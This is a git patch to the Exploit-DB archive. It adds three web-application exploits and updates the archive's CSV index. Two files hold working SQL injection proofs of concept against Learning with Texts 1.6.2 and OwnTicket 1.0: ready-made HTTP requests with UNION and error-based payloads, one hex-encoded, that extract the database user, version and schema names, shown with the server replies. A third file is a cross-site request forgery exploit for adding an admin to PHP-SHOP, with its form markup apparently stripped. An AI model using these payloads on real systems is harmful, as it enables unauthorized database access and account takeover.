From fa0fe9b6cf95baf3bbbc404ad5e7327164a0d133 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 19 Oct 2018 05:01:47 +0000 Subject: [PATCH] DB: 2018-10-19 3 changes to exploits/shellcodes MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection HaPe PKH 1.1 - 'id' SQL Injection LUYA CMS 1.0.12 - Cross-Site Scripting Phoenix Contact WebVisit 2985725 - Authentication Bypass HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin) CAMALEON CMS 2.4 - Cross-Site Scripting HaPe PKH 1.1 - Arbitrary File Upload SugarCRM 6.5.26 - Cross-Site Scripting HaPe PKH 1.1 - 'id' SQL Injection LUYA CMS 1.0.12 - Cross-Site Scripting Phoenix Contact WebVisit 2985725 - Authentication Bypass HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin) CAMALEON CMS 2.4 - Cross-Site Scripting HaPe PKH 1.1 - Arbitrary File Upload SugarCRM 6.5.26 - Cross-Site Scripting Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin) AlchemyCMS 4.1 - Cross-Site Scripting Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin) AlchemyCMS 4.1 - Cross-Site Scripting College Notes Management System 1.0 - 'user' SQL Injection Academic Timetable Final Build 7.0 - Information Disclosure KORA 2.7.0 - 'cid' SQL Injection HotelDruid 2.2.4 - 'anno' SQL Injection Navigate CMS 2.8.5 - Arbitrary File Download Library CMS 2.1.1 - Cross-Site Scripting Kados R10 GreenBee - 'release_id' SQL Injection Vishesh Auto Index 3.1 - 'fid' SQL Injection WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection MV Video Sharing Software 1.2 - 'searchname' SQL Injection GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection Academic Timetable Final Build 7.0 - Information Disclosure KORA 2.7.0 - 'cid' SQL Injection HotelDruid 2.2.4 - 'anno' SQL Injection Navigate CMS 2.8.5 - Arbitrary File Download Library CMS 2.1.1 - Cross-Site Scripting Kados R10 GreenBee - 'release_id' SQL Injection Vishesh Auto Index 3.1 - 'fid' SQL Injection WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection MV Video Sharing Software 1.2 - 'searchname' SQL Injection GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection BigTree CMS 4.2.23 - Cross-Site Scripting Learning with Texts 1.6.2 - 'start' SQL Injection PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add admin) OwnTicket 1.0 - 'TicketID' SQL Injection --- exploits/php/webapps/45635.txt | 108 +++++++++++++++++++++++++++++++++ exploits/php/webapps/45636.txt | 32 ++++++++++ exploits/php/webapps/45637.txt | 58 ++++++++++++++++++ files_exploits.csv | 51 ++++++++-------- 4 files changed, 225 insertions(+), 24 deletions(-) create mode 100644 exploits/php/webapps/45635.txt create mode 100644 exploits/php/webapps/45636.txt create mode 100644 exploits/php/webapps/45637.txt diff --git a/exploits/php/webapps/45635.txt b/exploits/php/webapps/45635.txt new file mode 100644 index 000000000..fe488e6f0 --- /dev/null +++ b/exploits/php/webapps/45635.txt @@ -0,0 +1,108 @@ +# Exploit Title: Learning with Texts 1.6.2 - 'start' SQL Injection +# Dork: N/A +# Date: 2018-10-18 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://lwt.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/lwt/files/latest/download +# Version: 1.6.2 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/do_text.php?start=[SQL] + +GET /[PATH]/do_text.php?start=1%20aND%20(SeLecT%2066%20FroM(SeLecT%20couNT(*),coNcaT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SeLecT%20(eLT(66=66,1))),0x716b6b6a71,FLoor(raND(0)*2))x%20FroM%20INForMaTIoN_ScHeMa.PLuGINS%20GrouP%20BY%20x)a) HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 00:15:33 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=tqrrq29el6irt0blfl2vniiki4; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 1243 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/delete_mword.php?wid=[SQL] + +GET /[PATH]/delete_mword.php?wid=%27%27%20And%20EXTraCTVALUE(22,CONcaT(0x5c,version(),(SEleCT%20(ELT(1=1,1))),database()))--%20Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 00:22:13 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=3cmjrq63ttrcr53skm7jbrs4j1; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 868 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/edit_words.php?new=1&lang=[SQL] + +GET /[PATH]/edit_words.php?new=1&lang=-11%20UnioN%20SElect%20NULL,NULL,CONCAT((SELECT+(@x)+FROM+(SELECT+(@x:=0x00),(@NR_DB:=0),(SELECT+(0)+FROM+(INFORMATION_SCHEMA.SCHEMATA)+WHERE+(@x)+IN+(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x))--++Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=3cmjrq63ttrcr53skm7jbrs4j1 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 00:31:33 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Wed, 11 Jan 1984 05:00:00 GMT +Cache-Control: no-cache, must-revalidate, max-age=0 +Pragma: no-cache +Last-Modified: Thu, 18 Oct 2018 00:31:33 GMT +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 4) +# http://localhost/[PATH]/display_impr_text_header.php?text=[SQL] + +GET /[PATH]/display_impr_text_header.php?text=-11%20UNION%20ALL%20SELECT%20%20666666,%20666666,666666,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)--+Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=3cmjrq63ttrcr53skm7jbrs4j1 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 00:44:43 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Wed, 11 Jan 1984 05:00:00 GMT +Cache-Control: no-cache, must-revalidate, max-age=0 +Pragma: no-cache +Last-Modified: Thu, 18 Oct 2018 00:44:43 GMT +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45636.txt b/exploits/php/webapps/45636.txt new file mode 100644 index 000000000..1b19dfcc6 --- /dev/null +++ b/exploits/php/webapps/45636.txt @@ -0,0 +1,32 @@ +# Exploit Title: PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add admin) +# Exploit Author : Alireza Norkazemi +# Date: 2018-10-15 +# Vendor Homepage : https://github.com/joeyrush/PHP-SHOP +# Software link: https://github.com/joeyrush/PHP-SHOP/archive/master.zip +# Version: 1.0 +# Tested on: Windows 10 +# CVE: N/A + +# Proof of concept: +# Exploit: + + + + +POC + + +
+ + + + + + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/45637.txt b/exploits/php/webapps/45637.txt new file mode 100644 index 000000000..06d7cc781 --- /dev/null +++ b/exploits/php/webapps/45637.txt @@ -0,0 +1,58 @@ +# Exploit Title: OwnTicket 1.0 - 'TicketID' SQL Injection +# Dork: N/A +# Date: 2018-10-18 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://ownticket.sourceforge.io/ +# Software Link: https://sourceforge.net/projects/ownticket/files/latest/download +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/index.php?showTicketId=[SQL] + +GET /[PATH]/index.php?showTicketId=%2d%31%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%28%33%29%2c%28%34%29%2c%28%35%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%37%29%2c%28%38%29%2c%28%39%29%2c%28%31%30%29%2c%28%31%31%29%2c%28%31%32%29%2c%28%31%33%29%2c%28%31%34%29%29%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=fhk729lg8ki4c9d1l24pbh8qn2 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 12:21:31 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/index.php?editTicketStatusId=[SQL] + +GET /[PATH]/index.php?editTicketStatusId=%2d%31%27%20%20%55%4e%49%4f%4e%28%53%45%4c%45%43%54%28%31%29%2c%28%32%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%34%29%2c%28%35%29%2c%28%36%29%2c%28%37%29%2c%28%38%29%29%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=fcb8l8apgcokqmoeiahhpud9g2 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 12:24:12 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index dbf4c5c06..2950df989 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -39520,7 +39520,7 @@ id,file,description,date,author,type,platform,port 44164,exploits/php/webapps/44164.txt,"Joomla! Component Proclaim 9.1.1 - Arbitrary File Upload",2018-02-22,"Ihsan Sencan",webapps,php, 44165,exploits/php/webapps/44165.txt,"Joomla! Component OS Property Real Estate 3.12.7 - SQL Injection",2018-02-22,"Ihsan Sencan",webapps,php, 44166,exploits/jsp/webapps/44166.txt,"Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities",2018-02-22,"Core Security",webapps,jsp, -45605,exploits/php/webapps/45605.txt,"MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php, +45605,exploits/php/webapps/45605.txt,"MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,80 44186,exploits/php/webapps/44186.txt,"MyBB My Arcade Plugin 1.3 - Cross-Site Scripting",2018-02-27,0xB9,webapps,php, 44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple, 44191,exploits/php/webapps/44191.txt,"School Management Script 3.0.4 - Authentication Bypass",2018-02-27,"Samiran Santra",webapps,php, @@ -40117,36 +40117,39 @@ id,file,description,date,author,type,platform,port 45582,exploits/php/webapps/45582.txt,"E-Registrasi Pencak Silat 18.10 - 'id_partai' SQL Injection",2018-10-11,"Ihsan Sencan",webapps,php, 45584,exploits/php/webapps/45584.txt,"jQuery-File-Upload 9.22.0 - Arbitrary File Upload",2018-10-11,"Larry W. Cashdollar",webapps,php, 45586,exploits/hardware/webapps/45586.py,"Phoenix Contact WebVisit 6.40.00 - Password Disclosure",2018-10-11,Photubias,webapps,hardware, -45588,exploits/php/webapps/45588.txt,"HaPe PKH 1.1 - 'id' SQL Injection",2018-10-12,"Ihsan Sencan",webapps,php, -45589,exploits/php/webapps/45589.txt,"LUYA CMS 1.0.12 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,php, -45590,exploits/windows/webapps/45590.py,"Phoenix Contact WebVisit 2985725 - Authentication Bypass",2018-10-12,Photubias,webapps,windows, -45591,exploits/php/webapps/45591.txt,"HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin)",2018-10-12,"Ihsan Sencan",webapps,php, -45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby, -45593,exploits/php/webapps/45593.txt,"HaPe PKH 1.1 - Arbitrary File Upload",2018-10-12,"Ihsan Sencan",webapps,php, -45594,exploits/php/webapps/45594.txt,"SugarCRM 6.5.26 - Cross-Site Scripting",2018-10-12,"Purplemet Security",webapps,php, +45588,exploits/php/webapps/45588.txt,"HaPe PKH 1.1 - 'id' SQL Injection",2018-10-12,"Ihsan Sencan",webapps,php,80 +45589,exploits/php/webapps/45589.txt,"LUYA CMS 1.0.12 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,php,80 +45590,exploits/windows/webapps/45590.py,"Phoenix Contact WebVisit 2985725 - Authentication Bypass",2018-10-12,Photubias,webapps,windows,80 +45591,exploits/php/webapps/45591.txt,"HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin)",2018-10-12,"Ihsan Sencan",webapps,php,80 +45592,exploits/ruby/webapps/45592.txt,"CAMALEON CMS 2.4 - Cross-Site Scripting",2018-10-12,"Ismail Tasdelen",webapps,ruby,80 +45593,exploits/php/webapps/45593.txt,"HaPe PKH 1.1 - Arbitrary File Upload",2018-10-12,"Ihsan Sencan",webapps,php,80 +45594,exploits/php/webapps/45594.txt,"SugarCRM 6.5.26 - Cross-Site Scripting",2018-10-12,"Purplemet Security",webapps,php,80 45595,exploits/multiple/webapps/45595.py,"FluxBB < 1.5.6 - SQL Injection",2014-11-21,secthrowaway,webapps,multiple, -45596,exploits/php/webapps/45596.txt,"Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php, +45596,exploits/php/webapps/45596.txt,"Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,80 45597,exploits/hardware/webapps/45597.txt,"FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure",2018-10-15,LiquidWorm,webapps,hardware, 45599,exploits/hardware/webapps/45599.txt,"FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure",2018-10-15,LiquidWorm,webapps,hardware, -45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php, -45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby, +45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,80 +45601,exploits/ruby/webapps/45601.txt,"AlchemyCMS 4.1 - Cross-Site Scripting",2018-10-15,"Ismail Tasdelen",webapps,ruby,80 45602,exploits/hardware/webapps/45602.py,"FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution",2018-10-15,LiquidWorm,webapps,hardware, -45603,exploits/php/webapps/45603.txt,"College Notes Management System 1.0 - 'user' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php, +45603,exploits/php/webapps/45603.txt,"College Notes Management System 1.0 - 'user' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,80 45604,exploits/php/webapps/45604.txt,"Advanced HRM 1.6 - Remote Code Execution",2018-10-15,"Renos Nikolaou",webapps,php, 45610,exploits/php/webapps/45610.txt,"Centos Web Panel 0.9.8.480 - Multiple Vulnerabilities",2018-10-15,seccops,webapps,php, -45612,exploits/php/webapps/45612.php,"Academic Timetable Final Build 7.0 - Information Disclosure",2018-10-15,"Ihsan Sencan",webapps,php, -45613,exploits/php/webapps/45613.txt,"KORA 2.7.0 - 'cid' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php, -45614,exploits/php/webapps/45614.txt,"HotelDruid 2.2.4 - 'anno' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php, -45615,exploits/php/webapps/45615.txt,"Navigate CMS 2.8.5 - Arbitrary File Download",2018-10-16,"Ihsan Sencan",webapps,php, -45616,exploits/php/webapps/45616.txt,"Library CMS 2.1.1 - Cross-Site Scripting",2018-10-16,"Ismail Tasdelen",webapps,php, -45617,exploits/php/webapps/45617.txt,"Kados R10 GreenBee - 'release_id' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php, -45618,exploits/php/webapps/45618.txt,"Vishesh Auto Index 3.1 - 'fid' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php, -45619,exploits/php/webapps/45619.txt,"WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting",2018-10-16,"Ismail Tasdelen",webapps,php, -45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php, -45621,exploits/php/webapps/45621.txt,"MV Video Sharing Software 1.2 - 'searchname' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php, -45622,exploits/php/webapps/45622.txt,"GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php, +45612,exploits/php/webapps/45612.php,"Academic Timetable Final Build 7.0 - Information Disclosure",2018-10-15,"Ihsan Sencan",webapps,php,80 +45613,exploits/php/webapps/45613.txt,"KORA 2.7.0 - 'cid' SQL Injection",2018-10-15,"Ihsan Sencan",webapps,php,80 +45614,exploits/php/webapps/45614.txt,"HotelDruid 2.2.4 - 'anno' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80 +45615,exploits/php/webapps/45615.txt,"Navigate CMS 2.8.5 - Arbitrary File Download",2018-10-16,"Ihsan Sencan",webapps,php,80 +45616,exploits/php/webapps/45616.txt,"Library CMS 2.1.1 - Cross-Site Scripting",2018-10-16,"Ismail Tasdelen",webapps,php,80 +45617,exploits/php/webapps/45617.txt,"Kados R10 GreenBee - 'release_id' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80 +45618,exploits/php/webapps/45618.txt,"Vishesh Auto Index 3.1 - 'fid' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80 +45619,exploits/php/webapps/45619.txt,"WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting",2018-10-16,"Ismail Tasdelen",webapps,php,80 +45620,exploits/php/webapps/45620.txt,"Rukovoditel Project Management CRM 2.3 - 'path' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80 +45621,exploits/php/webapps/45621.txt,"MV Video Sharing Software 1.2 - 'searchname' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80 +45622,exploits/php/webapps/45622.txt,"GIU Gallery Image Upload 0.3.1 - 'category' SQL Injection",2018-10-16,"Ihsan Sencan",webapps,php,80 45623,exploits/hardware/webapps/45623.sh,"Heatmiser Wifi Thermostat 1.7 - Credential Disclosure",2018-10-16,d0wnp0ur,webapps,hardware, -45628,exploits/php/webapps/45628.txt,"BigTree CMS 4.2.23 - Cross-Site Scripting",2018-10-17,"Ismail Tasdelen",webapps,php, +45628,exploits/php/webapps/45628.txt,"BigTree CMS 4.2.23 - Cross-Site Scripting",2018-10-17,"Ismail Tasdelen",webapps,php,80 45630,exploits/php/webapps/45630.txt,"Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin)",2018-10-17,"Ihsan Sencan",webapps,php, 45632,exploits/hardware/webapps/45632.txt,"TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure",2018-10-17,LiquidWorm,webapps,hardware, 45633,exploits/php/webapps/45633.txt,"Time and Expense Management System 3.0 - 'table' SQL Injection",2018-10-17,"Ihsan Sencan",webapps,php, +45635,exploits/php/webapps/45635.txt,"Learning with Texts 1.6.2 - 'start' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php, +45636,exploits/php/webapps/45636.txt,"PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add admin)",2018-10-18,"Alireza Norkazemi",webapps,php,80 +45637,exploits/php/webapps/45637.txt,"OwnTicket 1.0 - 'TicketID' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php,